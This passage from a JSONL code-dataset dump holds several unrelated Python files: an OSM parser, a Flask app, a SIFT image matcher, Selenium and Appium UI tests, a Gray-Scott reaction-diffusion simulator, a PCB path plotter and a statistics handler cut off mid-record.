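y_onehot = to_categorical(y, num_classes=num_classes)   # shape (4, 3)
y_seq = y_onehot.reshape(-1, 1, num_classes)            # shape (4, 1, 3)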
decode_node_to_csv():\n    for entry in parse_file(osm_load_path):\n        if (isinstance(entry, Node) and \n            'addr:postcode' in entry.tags and\n            'addr:street' in entry.tags and\n            'addr:housenumber' in entry.tags):\n            yield entry\n    \n# Parse the OSM file into a dict\ndef getOpenStreetMapAsDict():\n    \n    #limit = 20000\n    map_osm = {}\n    for idx, decoded_node in enumerate(decode_node_to_csv()):\n        # uncomment for limit\n#        if idx > limit:\n#            print(\"limit reached - done reading osm\")\n#            return map_osm\n        housenumber = \"\"\n        try:\n            street = decoded_node.tags['addr:street']\n            housenumber = decoded_node.tags['addr:housenumber']\n            zip_code = decoded_node.tags['addr:postcode']\n            lon = decoded_node.lon\n            lat = decoded_node.lat\n            address_zip = street + \" \" + housenumber + \", \" + str(zip_code)\n            gps = [lon,lat]\n            map_osm[address_zip] = gps\n        except Exception:\n            print(\"An OSM row was ignored due to a parsing error\")\n    print(\"done reading osm\")\n    return map_osm","sub_path":"assignment_3/osm_handler.py","file_name":"osm_handler.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"514791325","text":"from flask import Flask, render_template, redirect, url_for, request\r\nimport dekorator\r\nimport povrsinaIGrafik\r\nimport genetskiAlgoritam\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n    return render_template(\"ispitni_zadaci.html\")\r\n\r\n\r\n@app.route('/z1')\r\ndef z1():\r\n    poruke = dekorator.mainEntry()\r\n    return render_template(\"z1.html\", txt=poruke)\r\n\r\n\r\n@app.route('/z2')\r\ndef z2():\r\n    poruka = povrsinaIGrafik.mainEntry()\r\n    return render_template(\"z2.html\", txt=poruka)\r\n\r\n@app.route('/nacrtaj')\r\ndef nacrtaj():\r\n    povrsinaIGrafik.nacrtaj()\r\n    poruka = povrsinaIGrafik.mainEntry()\r\n    return render_template(\"z2.html\", txt=poruka)\r\n\r\n\r\n@app.route('/z3')\r\ndef z3():\r\n    poruka = genetskiAlgoritam.glavnaPetlja()\r\n    return render_template(\"z3.html\", txt=poruka)\r\n\r\n@app.route('/prikaziTackasto')\r\ndef prikaziTackasto():\r\n    genetskiAlgoritam.prikazi()\r\n    poruka = genetskiAlgoritam.glavnaPetlja()\r\n    return render_template(\"z3.html\", txt=poruka)\r\n\r\nif __name__ == '__main__':\r\n    app.run()","sub_path":"flask1.py","file_name":"flask1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"215931812","text":"# Exercise 5: This program records the domain name (instead of the\n# address) where the message was sent from instead of who the mail came\n# from (i.e., the whole email address). 
At the end of the program, print\n# out the contents of your dictionary.\n\nname = 'mbox-short.txt'\nhandle = open(name)\n\ncounts = dict()\n\nfor line in handle:\n    if line.startswith('From '):\n        email = line.split()[1]\n        address = email[email.find('@') + 1:]\n        counts[address] = counts.get(address, 0) + 1\n\nprint(counts)","sub_path":"Course2/exercises/exercise9.5.py","file_name":"exercise9.5.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"1806653","text":"from deque import Deque\n\ndef palindrome(string: str) -> bool:\n    \"\"\"Return True if the input string is a palindrome.\n\n    Args:\n        string (str): input string to check\n\n    Returns:\n        bool: True if palindrome, False if not\n    \"\"\"\n    d = Deque()\n    for ch in string:\n        d.addRear(ch)\n    \n    equal = True\n    while d.size() > 1 and equal:\n        front = d.removeFront()\n        rear = d.removeRear()\n        if front != rear:\n            equal = False\n    return equal\n\ndef main():\n    s = \"racecar\"\n    assert palindrome(s) == True\n    s = \"notapalindrome\"\n    assert palindrome(s) == False","sub_path":"deque/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"608877298","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 22:30:49 2018\n0.23/1.4\n@author: Windows\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n\n\"\"\"\nUse SIFT keypoint detection and matching to find a specific object in a scene.\n\"\"\"\n\nMIN_MATCH_COUNT = 4 # at least 4 robust keypoints are required\n\nimgname1 = \"003-a.jpg\"\nimgname2 = \"003-b.jpg\"\n\n\nimg1 = cv2.imread(imgname1)\nimg2 = cv2.imread(imgname2)\n\ngray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\ngray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\nsift = cv2.xfeatures2d.SIFT_create()\n\nmatcher = cv2.FlannBasedMatcher(dict(algorithm= 1, trees = 5), {})\n\nkpts1, descs1 = sift.detectAndCompute(gray1, None,)\nkpts2, descs2 = sift.detectAndCompute(gray2, None,)\n\nmatches = matcher.knnMatch(descs1, descs2, 2)\n\nmatches = sorted(matches, key = lambda x:x[0].distance)\n\ngood = [m1 for (m1, m2) in matches if m1.distance < 0.26 * m2.distance]\nprint(len(good))\ncanvas = img2.copy()\n\nif len(good) > MIN_MATCH_COUNT:\n\n    src_pts = np.float32([ kpts1[m.queryIdx].pt for m in good ]).reshape(-1,1,2) # matched keypoint coordinates from image 1 as a numpy array\n    dst_pts = np.float32([ kpts2[m.trainIdx].pt for m in good ]).reshape(-1,1,2) # matched keypoint coordinates from image 2 as a numpy array\n    #print (src_pts[0],dst_pts[0])\n    #a = src_pts[0]\n    #b = dst_pts[0]\n    #c = np.sqrt(np.sum(np.square(a - b) \n    b = len(dst_pts)\n    sum = 0\n    j = 0\n    src_sub_a = []\n    dst_sub_a = []\n    jilushuzu = []\n    for i in range(0,b):\n        dist = np.linalg.norm(src_pts[i] - dst_pts[i])\n        jilushuzu.append(dist)\n    a = (len(jilushuzu))\n    #print (jilushuzu)\n    #print (jilushuzu)\n    for i in jilushuzu:\n        sum = sum + i\n    a = sum/a\n\n    for i in range(0,b):\n        dist = np.linalg.norm(src_pts[i] - dst_pts[i])\n        if dist > 1.4*a:\n            src_sub_a.append(src_pts[i])\n            dst_sub_a.append(dst_pts[i])\n\n    #print (src_sub_a ,dst_sub_a)\n    cv2.polylines(img1,[np.int32(src_sub_a)],True,(0,255,0),3, cv2.LINE_AA)\n    cv2.polylines(canvas,[np.int32(dst_sub_a)],True,(0,0,255),3, cv2.LINE_AA)\n    matched = np.hstack((img1, canvas)) # stack the two images side by side \n\n    cv2.imwrite(\"matched7.png\", matched)\n\n    win = cv2.namedWindow('test win2', flags=0)\n\n    cv2.imshow('test win2', 
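# Sketch: the counts.get(key, 0) + 1 idiom above is exactly what collections.Counter
# packages up; an equivalent version of the domain tally, assuming the same mbox format:
from collections import Counter

counts = Counter()
with open('mbox-short.txt') as handle:
    for line in handle:
        if line.startswith('From '):
            email = line.split()[1]
            counts[email[email.find('@') + 1:]] += 1
print(dict(counts))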
matched)\n cv2.waitKey();\n cv2.destroyAllWindows()\nelse:\n print( \"Not enough matches are found - \".format(len(good),MIN_MATCH_COUNT))","sub_path":"求平均距离后比较.py","file_name":"求平均距离后比较.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"46050460","text":"def maccarthy91(n):\n k = 1\n while k:\n if n > 100:\n n -= 10\n k -= 1\n else:\n n += 11\n k += 1\n return n\n\ndef maccarthy91_rec(n):\n if n > 100:\n return n - 10\n else:\n return maccarthy91_rec(maccarthy91_rec(n+11))\n\nprint(maccarthy91(80))\nprint(maccarthy91(110))\n","sub_path":"100days_algorithm/day11_mccarthy91.py","file_name":"day11_mccarthy91.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"161680726","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(4)\ndriver.get('https://www.amazon.com/')\n\nsearch_field = driver.find_element(By.ID, 'twotabsearchtextbox')\nsearch_field.send_keys('Watches')\n\nsearch_icon = driver.find_element(By.ID, 'nav-search-submit-button')\nsearch_icon.click()\n\nactual_text = driver.find_element(By.XPATH, \"//span[@class='a-color-state a-text-bold']\").text\nexpected_text = '\"Watches\"'\n\nassert expected_text == actual_text, f'Expected {expected_text}, but got {actual_text}'\ndriver.quit()\n","sub_path":"amazon_script.py","file_name":"amazon_script.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"138163993","text":"from requests import get\nimport pytz\nfrom time import strftime\nfrom datetime import datetime\n\n\nNIGHT_BEGINNING = 0\nNIGHT_ENDING = 7\n\n\ndef load_data_from_page(page_number):\n parameters = {\n 'page': page_number\n }\n \n api_url = 'http://devman.org/api/challenges/solution_attempts/'\n \n response = get(url=api_url, params=parameters)\n \n return response.json()\n\n\ndef load_attempts():\n page_data = load_data_from_page(1) # load first time to find number of pages\n \n pages = page_data['number_of_pages']\n\n for peace in page_data['records']:\n yield {\n 'username': peace['username'],\n 'timestamp': peace['timestamp'],\n 'timezone': peace['timezone'],\n }\n \n for page in range(1, pages): # already got info from first (0) page\n page_data = load_data_from_page(page+1)\n for peace in page_data['records']:\n yield {\n 'username': peace['username'],\n 'timestamp': peace['timestamp'],\n 'timezone': peace['timezone'],\n }\n\n\ndef get_midnighters(list_of_users):\n for user in list_of_users:\n timezone = pytz.timezone(user['timezone'])\n if user['timestamp'] is None:\n continue\n user_time = datetime.fromtimestamp(user['timestamp'], timezone)\n if NIGHT_BEGINNING < user_time.hour < NIGHT_ENDING:\n yield {\n 'username': user['username'],\n 'time': strftime('%H:%M:%S', datetime.timetuple(datetime.fromtimestamp(user['timestamp'], timezone)))\n }\n\nif __name__ == '__main__':\n for user in get_midnighters(load_attempts()):\n print(user['time'], user['username'])\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"542407649","text":"# pylint: disable=unused-argument\n# pylint: 
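# Sketch: get_midnighters above localizes each UNIX timestamp into the submitter's own
# timezone before testing the strict (0, 7) night window. The core conversion, with a
# made-up sample record:
from datetime import datetime
import pytz

record = {'timestamp': 1502093812, 'timezone': 'Europe/Moscow'}   # hypothetical sample
local = datetime.fromtimestamp(record['timestamp'], pytz.timezone(record['timezone']))
is_midnighter = 0 < local.hour < 7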
disable=redefined-builtin\n\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nReaction-Diffusion Simulation with Pyglet and GLSL\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nUsage: python main.py\n\nFor how to use mouse and keyboard to play with the simulation see the doc below.\n\n:copyright (c) 2017 by Zhao Liang.\n\"\"\"\n\nimport os, shutil\n\nif os.path.exists('frames'):\n shutil.rmtree('frames')\nos.makedirs('frames')\n\nimport json\nimport numpy as np\n\ntry:\n raw_input\nexcept NameError:\n raw_input = input\n\nimport pyglet\npyglet.options['debug_gl'] = False\nimport pyglet.gl as gl\n\nfrom PIL import Image\nfrom shader import Shader\nfrom framebuffer import FrameBuffer\n\n\n# pattern: [rU, rV, feed, kill]\nSPECIES = {'bacteria1': [0.16, 0.08, 0.035, 0.065],\n 'bacteria2': [0.14, 0.06, 0.035, 0.065],\n 'coral': [0.16, 0.08, 0.060, 0.062],\n 'fingerprint': [0.19, 0.05, 0.060, 0.062],\n 'spirals': [0.10, 0.10, 0.018, 0.050],\n 'spirals_dense': [0.12, 0.08, 0.020, 0.050],\n 'spirals_fast': [0.10, 0.16, 0.020, 0.050],\n 'unstable': [0.2097, 0.105, 0.018, 0.051],\n 'net': [0.2097, 0.105, 0.039, 0.058],\n 'worms1': [0.16, 0.08, 0.050, 0.065],\n 'worms2': [0.16, 0.08, 0.054, 0.063],\n 'zebrafish': [0.16, 0.08, 0.035, 0.060],}\n\n\ndef create_texture_from_array(array):\n \"\"\"Create a pyglet texture instance from a numpy ndarray.\"\"\"\n height, width = array.shape[:2]\n texture = pyglet.image.Texture.create_for_size(gl.GL_TEXTURE_2D, width, height, gl.GL_RGBA32F_ARB)\n gl.glBindTexture(texture.target, texture.id)\n gl.glTexImage2D(texture.target, texture.level, gl.GL_RGBA32F_ARB,\n width, height, 0, gl.GL_RGBA, gl.GL_FLOAT, array.ctypes.data)\n gl.glBindTexture(texture.target, 0)\n return texture\n\n\nclass GrayScott(pyglet.window.Window):\n \"\"\"\n ----------------------------------------------------------\n | This simulation uses mouse and keyboard to control the |\n | patterns and colors. At any time you may click or drag |\n | your mouse to draw on the screen. |\n | |\n | Keyboard control: |\n | 1. press 'space' to clear the window to blank. |\n | 2. press 'p' to change to a random palette. |\n | 3. press 's' to change to another pattern. |\n | 4. press 'Ctrl + s' to save current config. |\n | 5. press 'Ctrl + o' to load config from json file. |\n | 6. press 'Enter' to take screenshots. |\n | 7. press 'Ctrl + v' to start saving frames and press |\n | 'Ctrl + v' again to stop saving frames. |\n | 8. press 'Esc' to exit. 
|\n ----------------------------------------------------------\n \"\"\"\n \n def __init__(self, width, height, scale, config, video=False, mask=None, flip=False):\n \"\"\"\n width, height: size of the window in pixels.\n scale: the size of the texture is (width//scale) x (height//scale).\n config: a line number in the file `config.json`.\n video: whether or not to save frames from the beginning.\n mask: a user-defined image that will be converted to a white and black mask image.\n flip: choose whether the black pixels or the white pixels in the mask image are shown.\n \"\"\"\n pyglet.window.Window.__init__(self, width, height, caption='GrayScott Simulation',\n resizable=True, visible=False, vsync=False)\n self.tex_width, self.tex_height = width // scale, height // scale\n self.load_config(config)\n \n # Choose which reaction shader to use according to whether there is a mask image.\n if mask is None:\n self.reaction_shader = Shader('./glsl/default.vert', './glsl/reaction.frag') \n self.mask_texture = None\n else:\n self.reaction_shader = Shader('./glsl/default.vert', './glsl/reaction_with_mask.frag')\n img = Image.open(mask).convert('L').resize((self.tex_width, self.tex_height))\n img = (np.asarray(img) / 255.0).astype(np.float32)\n mask_texture = np.zeros(img.shape+(4,), dtype=np.float32)\n if flip:\n mask_texture[:, :, 0] = img[::-1]\n else:\n mask_texture[:, :, 0] = 1 - img[::-1]\n self.mask_texture = create_texture_from_array(mask_texture)\n \n self.render_shader = Shader('./glsl/default.vert', './glsl/render.frag')\n \n # Generate the uv_texture\n uv_grid = np.zeros((self.tex_height, self.tex_width, 4), dtype=np.float32)\n uv_grid[:, :, 0] = 1.0\n\n if self.mask_texture is None:\n # start evolving from the center.\n uv_grid[self.tex_height//2, self.tex_width//2, 1] = 1.0\n else:\n # start evolving from 10 random points.\n rand_rows = np.random.choice(range(self.tex_height), 10)\n rand_cols = np.random.choice(range(self.tex_width), 10)\n uv_grid[rand_rows, rand_cols, 1] = 1.0\n self.uv_texture = create_texture_from_array(uv_grid)\n \n # Bind the (one or two) texture(s).\n gl.glActiveTexture(gl.GL_TEXTURE0)\n gl.glBindTexture(self.uv_texture.target, self.uv_texture.id)\n if self.mask_texture is not None:\n gl.glActiveTexture(gl.GL_TEXTURE1)\n gl.glBindTexture(self.mask_texture.target, self.mask_texture.id)\n \n # Use an invisible buffer to do the computation.\n with FrameBuffer() as self.fbo:\n self.fbo.attach_texture(self.uv_texture)\n\n self.mouse_down = False\n self._species_names = list(SPECIES.keys())\n\n # The next four attributes are used for saving frames.\n self.frame_count = 0\n self.video_on = video\n self.skip = 100\n self.max_frames = 100000\n\n # Finally initialize the two shaders.\n self.init_reaction_shader()\n self.init_render_shader()\n\n \n def load_config(self, config=None):\n \"\"\"Load a config from the json file.\"\"\"\n if config is None:\n try:\n config = int(raw_input('> Enter the line number in json file: ').strip())\n except ValueError:\n print('> Invalid input.\\n')\n return\n\n with open('config.json', 'r') as f:\n lines = f.readlines()\n if 1 <= config <= len(lines):\n (pattern, palette), = json.loads(lines[config - 1]).items()\n self.pattern = pattern\n self.palette = palette\n print('> Config loaded. Current config: ' + self.pattern + '. 
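# On the grayscott record above: the GLSL kernel in ./glsl/reaction.frag is
# not included in this dump, but the update it computes is the standard
# Gray-Scott pair. A rough CPU sketch in NumPy, assuming a 5-point Laplacian
# with wrap-around boundaries (the real fragment shader may differ):
import numpy as np

def gray_scott_step(U, V, rU, rV, feed, kill, dt=1.0):
    def lap(A):
        # 5-point Laplacian with periodic boundaries
        return (np.roll(A, 1, 0) + np.roll(A, -1, 0) +
                np.roll(A, 1, 1) + np.roll(A, -1, 1) - 4.0 * A)
    UVV = U * V * V
    U = U + (rU * lap(U) - UVV + feed * (1.0 - U)) * dt
    V = V + (rV * lap(V) + UVV - (feed + kill) * V) * dt
    return U, V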
Draw on it!\\n')\n else:\n print('> Config does not exist in json file.\\n')\n \n \n def init_reaction_shader(self):\n with self.reaction_shader:\n self.reaction_shader.set_uniformi('uv_texture', 0)\n if self.mask_texture is not None:\n self.reaction_shader.set_uniformi('mask_texture', 1)\n self.reaction_shader.set_uniformf('dx', 1.0/self.tex_width)\n self.reaction_shader.set_uniformf('dy', 1.0/self.tex_height)\n # the order of the vertices and texcoords matters,\n # since we will call 'GL_TRIANGLE_STRIP' to draw them.\n self.reaction_shader.set_vertex_attrib('position', [-1, -1, 1, -1, -1, 1, 1, 1])\n self.reaction_shader.set_vertex_attrib('texcoord', [0, 0, 1, 0, 0, 1, 1, 1])\n self.reaction_shader.set_uniformf('u_mouse', -1, -1)\n self.use_pattern(self.pattern)\n \n \n def init_render_shader(self):\n with self.render_shader:\n self.render_shader.set_uniformi('uv_texture', 0)\n self.render_shader.set_vertex_attrib('position', [-1, -1, 1, -1, -1, 1, 1, 1])\n self.render_shader.set_vertex_attrib('texcoord', [0, 0, 1, 0, 0, 1, 1, 1])\n self.use_palette(self.palette)\n \n \n def use_pattern(self, pattern):\n rU, rV, feed, kill = SPECIES[pattern]\n with self.reaction_shader:\n self.reaction_shader.set_uniformf('feed', feed)\n self.reaction_shader.set_uniformf('kill', kill)\n self.reaction_shader.set_uniformf('rU', rU)\n self.reaction_shader.set_uniformf('rV', rV)\n \n \n def use_palette(self, palette):\n color1, color2, color3, color4, color5 = palette\n with self.render_shader:\n self.render_shader.set_uniformf('color1', *color1)\n self.render_shader.set_uniformf('color2', *color2)\n self.render_shader.set_uniformf('color3', *color3)\n self.render_shader.set_uniformf('color4', *color4)\n self.render_shader.set_uniformf('color5', *color5)\n \n \n def set_viewport(self, width, height):\n gl.glViewport(0, 0, width, height)\n gl.glMatrixMode(gl.GL_PROJECTION)\n gl.glLoadIdentity()\n gl.glOrtho(0, 1, 0, 1, -1, 1)\n gl.glMatrixMode(gl.GL_MODELVIEW)\n \n \n def on_draw(self):\n gl.glClearColor(0, 0, 0, 0)\n self.clear()\n\n # Since we are rendering to the invisible framebuffer,\n # the size is the texture's size.\n self.set_viewport(self.tex_width, self.tex_height)\n\n with self.fbo:\n with self.reaction_shader:\n gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, 4)\n\n # Now we render to the actual window, hence the size is window's size.\n self.set_viewport(self.width, self.height)\n with self.render_shader:\n gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, 4)\n \n if self.video_on:\n if (self.frame_count % self.skip == 0) and (self.frame_count < self.max_frames):\n self.save_video_frame(self.frame_count // self.skip)\n\n self.frame_count += 1\n \n \n def save_video_frame(self, index):\n img = pyglet.image.get_buffer_manager().get_color_buffer()\n img.save(os.path.join('frames', 'frame{:05d}.png'.format(index)))\n \n \n def update_mouse(self, *u_mouse):\n self.set_viewport(self.tex_width, self.tex_height)\n with self.fbo:\n with self.reaction_shader:\n self.reaction_shader.set_uniformf('u_mouse', *u_mouse)\n \n \n def on_mouse_press(self, x, y, button, modifiers):\n self.mouse_down = True\n bx = x / float(self.width)\n by = y / float(self.height)\n self.update_mouse(bx, by)\n\n\n def on_mouse_release(self, x, y, button, modifiers):\n self.mouse_down = False\n self.update_mouse(-1, -1)\n\n\n def on_mouse_drag(self, x, y, dx, dy, button, modifiers):\n if self.mouse_down:\n bx = x / float(self.width)\n by = y / float(self.height)\n self.update_mouse(bx, by)\n\n \n def on_key_press(self, symbol, modifiers):\n if 
symbol == pyglet.window.key.ENTER:\n self.save_screenshot()\n \n if symbol == pyglet.window.key.ESCAPE:\n pyglet.app.exit()\n \n # clear to blank window\n if symbol == pyglet.window.key.SPACE:\n self.update_mouse(-10, -10)\n \n if symbol == pyglet.window.key.S and not modifiers:\n self.change_pattern()\n\n if symbol == pyglet.window.key.P:\n self.change_palette()\n\n if symbol == pyglet.window.key.S:\n if modifiers & pyglet.window.key.LCTRL:\n self.save_config()\n\n if symbol == pyglet.window.key.O:\n if modifiers & pyglet.window.key.LCTRL:\n self.load_config()\n self.use_palette(self.palette)\n self.use_pattern(self.pattern)\n \n if symbol == pyglet.window.key.V:\n if modifiers & pyglet.window.key.LCTRL:\n self.switch_video_stats()\n \n \n def save_screenshot(self):\n index = np.random.randint(0, 1000)\n img = pyglet.image.get_buffer_manager().get_color_buffer()\n img.save('screenshot{:05d}.png'.format(index))\n \n \n def save_config(self):\n \"\"\"Save current config to the json file.\"\"\"\n with open('config.json', 'a+') as f:\n data = json.dumps({self.pattern: self.palette.tolist()})\n f.write(data + '\\n')\n print('> Config saved.\\n')\n \n \n def change_palette(self):\n \"\"\"Use a random palette.\"\"\"\n alphas = sorted(np.random.random(5))\n palette = np.random.random((5, 4))\n # The first row is set to 0 to make the background black.\n palette[0] = 0.0\n palette[:, -1] = alphas\n palette = palette.round(3)\n self.use_palette(palette)\n self.palette = palette\n print('> Current palette: ')\n print(palette)\n print('\\n')\n\n \n def change_pattern(self):\n \"\"\"Use the next pattern in the list `_species_names`.\"\"\"\n index = self._species_names.index(self.pattern)\n next_pattern = self._species_names[(index + 1) % len(self._species_names)]\n self.use_pattern(next_pattern)\n self.pattern = next_pattern\n print('> Current pattern: ' + self.pattern\n + '. 
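# On save_config/load_config above: the config file holds one JSON object per
# line, {pattern: palette}. A stand-alone round-trip of that format with
# made-up values (the file name here is illustrative, not the app's own):
import json

with open('config_demo.json', 'a+') as f:
    f.write(json.dumps({'unstable': [[0.0, 0.0, 0.0, 0.1]] * 5}) + '\n')
with open('config_demo.json') as f:
    (pattern, palette), = json.loads(f.readlines()[0]).items()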
If the screen is blank, draw on it!\\n')\n \n \n def switch_video_stats(self):\n self.video_on = not self.video_on\n if self.video_on:\n print('start saving frames ...')\n else:\n print('stop saving frames ...')\n self.frame_count = 0\n \n \n def run(self, fps=None):\n \"\"\"fps: frames per second.\"\"\"\n self.set_visible(True)\n if fps is None:\n pyglet.clock.schedule(lambda dt: None)\n else:\n pyglet.clock.schedule_interval(lambda dt: None, 1.0/fps)\n pyglet.app.run()\n \n\nif __name__ == '__main__':\n app = GrayScott(width=500, height=500, scale=1, config=1,\n video=False, mask='lena.jpg', flip=True)\n print(app.__doc__)\n app.run(fps=None) # use max fps.\n","sub_path":"src/grayscott/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"517233292","text":"import random\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom Fitness import Fitness\n\n\nclass PCBPrinter:\n\n def __init__(self, population):\n self.__population = population\n self.__pcb = population.individuals[0].pcb\n\n @property\n def population(self):\n return self.__population\n\n @population.setter\n def population(self, population):\n self.__population = population\n\n @property\n def pcb(self):\n return self.__pcb\n\n @pcb.setter\n def pcb(self, pcb):\n self.__pcb = pcb\n\n def draw_plot(self, individual):\n plt.clf()\n # FRAME\n x_frame = np.array([0, 0, self.pcb.width, self.pcb.width, 0])\n y_frame = np.array([0, self.pcb.height, self.pcb.height, 0, 0])\n plt.plot(x_frame, y_frame, linestyle='dashed')\n\n # TITLE\n title_font = {'family': 'serif', 'size': 16}\n plt.title(\"BEST INDIVIDUAL\", fontdict=title_font)\n\n for path in individual.paths:\n\n rand_color = \"#%06x\" % random.randint(0, 0xFFFFFF)\n\n # START & END POINT\n start = path.link.start_point\n end = path.link.end_point\n plt.plot([start.x], [start.y], marker='o', color=rand_color, ms=10)\n plt.plot([end.x], [end.y], marker='x', color=rand_color, ms=10)\n\n # SEGMENTS\n x_segments = [path.segments[0].start_point.x]\n y_segments = [path.segments[0].start_point.y]\n\n for segment in path.segments:\n x_segments.append(segment.end_point.x)\n y_segments.append(segment.end_point.y)\n\n plt.plot(x_segments, y_segments, color=rand_color)\n\n fit = Fitness(individual)\n fitness = fit.count_fitness()\n ind_info = fit.get_info()\n\n plt.figtext(0.2, 0, 'Length: ' + str(ind_info[0]) + ' Segments: '\n + str(ind_info[1]) + ' Crosses: ' + str(ind_info[2])\n + ' Fitness: ' + str(fitness) + '\\nPaths out of board: ' + str(ind_info[3]) + ' Length out of board: ' + str(ind_info[4]))\n\n plt.grid()\n plt.draw()\n plt.waitforbuttonpress(0)\n","sub_path":"PCBPrinter.py","file_name":"PCBPrinter.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"425259841","text":"from .basepageobj import myui,by\nfrom rundata.mydata import MyData\nimport logging\n\n\nclass Contact(myui):\n \"\"\"联系人类,联系人应用的操作全在此类中实现,实例化时需要传入driver\"\"\"\n\n def __init__(self,driver):\n self.driver = driver\n self.conf = MyData().get_element_data('contact')\n\n def input_contact_msg(self):\n \"\"\"输入联系人名称\"\"\"\n ine = self.driver.find_element(by.ID, self.conf['in_name_f_id'])\n conteactName = ine.find_elements_by_class_name(self.conf['in_classes'])\n conteactName[0].send_keys('test')\n conteactName[1].send_keys('test')\n\n def new_contact(self):\n \"\"\"新建联系人\"\"\"\n 
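# On the PCBPrinter.py record above: each path gets one random colour via
# "#%06x" % randint(0, 0xFFFFFF) and is drawn as a single polyline with start
# and end markers. The same idea reduced to plain coordinate tuples (the data
# is invented; the project's Path/Segment/Fitness classes are not shown):
import random
import matplotlib.pyplot as plt

paths = [[(0, 0), (1, 0), (1, 2)], [(2, 0), (2, 2), (0, 2)]]
for path in paths:
    color = "#%06x" % random.randint(0, 0xFFFFFF)
    xs, ys = zip(*path)
    plt.plot(xs, ys, color=color)
    plt.plot([xs[0]], [ys[0]], marker='o', color=color)   # start marker
    plt.plot([xs[-1]], [ys[-1]], marker='x', color=color)  # end marker
plt.show()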
self.driver.find_element(by.ID, self.conf['skip_id']).click()\n self.driver.find_element(by.ID,self.conf['add_id']).click()\n self.input_contact_msg()\n self.driver.find_element(by.ID, self.conf['save_id']).click()\n logging.info('已点击保存')\n text = self.driver.toast(\"已保存\")\n logging.info(text)\n assert '已保存' in text\n\n def del_contact(self):\n \"\"\"\n 删除联系人\n \"\"\"\n self.driver.find_element(by.ID, self.conf['skip_id']).click()\n e = self.driver.find_elements(by.ID,self.conf['ck_id'])\n #判断是否有联系人\n if len(e)==0:\n logging.info('no contact,please add')\n assert False\n else:\n e[0].click()\n self.driver.find_elements(by.CLASSNAME,self.conf['more_class'])[1].click()\n self.driver.find_element(by.TEXT,'删除').click()\n self.driver.find_element(by.ID, self.conf['is_id']).click()\n text = self.driver.toast(\"已删除\")\n logging.info(text)\n assert '已删除' in text","sub_path":"base/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63596669","text":"#!/usr/bin/env python\n# coding=utf-8\nimport decimal\nimport datetime\nfrom sqlalchemy import func\nfrom tablib import Dataset\nfrom taurusxradius.modules import models\nfrom taurusxradius.modules.customer import customer_forms\nfrom taurusxradius.modules.base import BaseHandler, authenticated\nfrom taurusxradius.taurusxlib.permit import permit\nfrom taurusxradius.taurusxlib import utils\nfrom taurusxradius.modules.settings import *\n\n@permit.suproute('/admin/stat/income/month', u'营业月统计', MenuStat, order=1.00002, is_menu=True)\n\nclass IncomeMonthStatHandler(BaseHandler):\n\n @authenticated\n def get(self):\n self.post()\n\n @authenticated\n def post(self):\n node_id = self.get_argument('node_id', None)\n product_id = self.get_argument('product_id', None)\n operator_name = self.get_argument('operator_name', None)\n query_begin_time = self.get_argument('query_begin_time', None)\n query_end_time = self.get_argument('query_end_time', None)\n pay_status = self.get_argument('pay_status', None)\n accept_type = self.get_argument('accept_type', None)\n opr_nodes = self.get_opr_nodes()\n opr_products = self.get_opr_products()\n _query = self.db.query(models.TrCustomer.node_id, models.TrNode.node_name, models.TrCustomerOrder.product_id, models.TrProduct.product_name, models.TrAcceptLog.operator_name, func.sum(models.TrCustomerOrder.actual_fee).label('actual_fee'), func.count(models.TrCustomerOrder.order_id).label('dev_count'), models.TrCustomerOrder.stat_month).filter(models.TrCustomerOrder.product_id == models.TrProduct.id, models.TrCustomerOrder.customer_id == models.TrCustomer.customer_id, models.TrNode.id == models.TrCustomer.node_id, models.TrAcceptLog.id == models.TrCustomerOrder.accept_id)\n if node_id:\n _query = _query.filter(models.TrCustomer.node_id == node_id)\n else:\n _query = _query.filter(models.TrCustomer.node_id.in_([ i.id for i in opr_nodes ]))\n if pay_status:\n _query = _query.filter(models.TrCustomerOrder.pay_status == int(pay_status))\n if accept_type:\n _query = _query.filter(models.TrAcceptLog.accept_type == accept_type)\n if 